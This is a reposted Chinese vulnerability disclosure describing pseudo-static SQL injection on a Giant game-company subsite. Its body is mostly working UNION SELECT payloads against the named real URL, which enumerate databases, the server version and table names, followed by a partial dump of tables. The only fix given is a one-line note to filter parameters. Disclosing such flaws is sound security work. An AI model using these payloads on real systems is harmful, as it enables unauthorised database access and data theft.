巨人某分站存在伪静态注入及修复

巨人某分站存在伪静态注入及修复 - 网站安全

来源：自学PHP网时间：2015-04-17 14:47 作者：阅读:次

[导读] 所有数据库漏洞证明：http://club.kok3.ztgame.com/index.php/Index/showGong/id/-516 UNION SELECT 1,2,3,4,database(),6,7,group_concat(schema_name),9,10,11,@@version,13 from information_schema.sch......

所有数据库

漏洞证明：http://club.kok3.ztgame.com/index.php/Index/showGong/id/-516 UNION SELECT 1,2,3,4,database(),6,7,group_concat(schema_name),9,10,11,@@version,13 from information_schema.schemata
当前数据库存在的表
http://club.kok3.ztgame.com/index.php/Index/showGong/id/-516 UNION SELECT 1,2,3,4,database(),6,7,group_concat(table_name),9,10,11,@@version,13 from information_schema.tables where table_schema=database()

think_album,
think_album_qun,
think_app,
think_attach,
think_blog,
think_boss,
think_chat,
think_code,
think_comment,
think_doing,
think_email,
think_file_group,
think_game,
think_gift,
think_gift_category,
think_gong,
think_gong_ding,
think_group,
think_group_member,
think_hello,
think_image,
think_jiazu,
think_koc,
think_love,
think_magic,
think_material,
think_m
修复方案：对提交的参数进行相关过滤

华三通信备件管理系统存在SQL 注入漏洞及修复

Wordpress网店插件eShop多重xss - 网站安全 - 自学ph

子栏目

巨人某分站存在伪静态注入及修复 - 网站安全

最新评论

添加评论

更多文章推荐

添加评论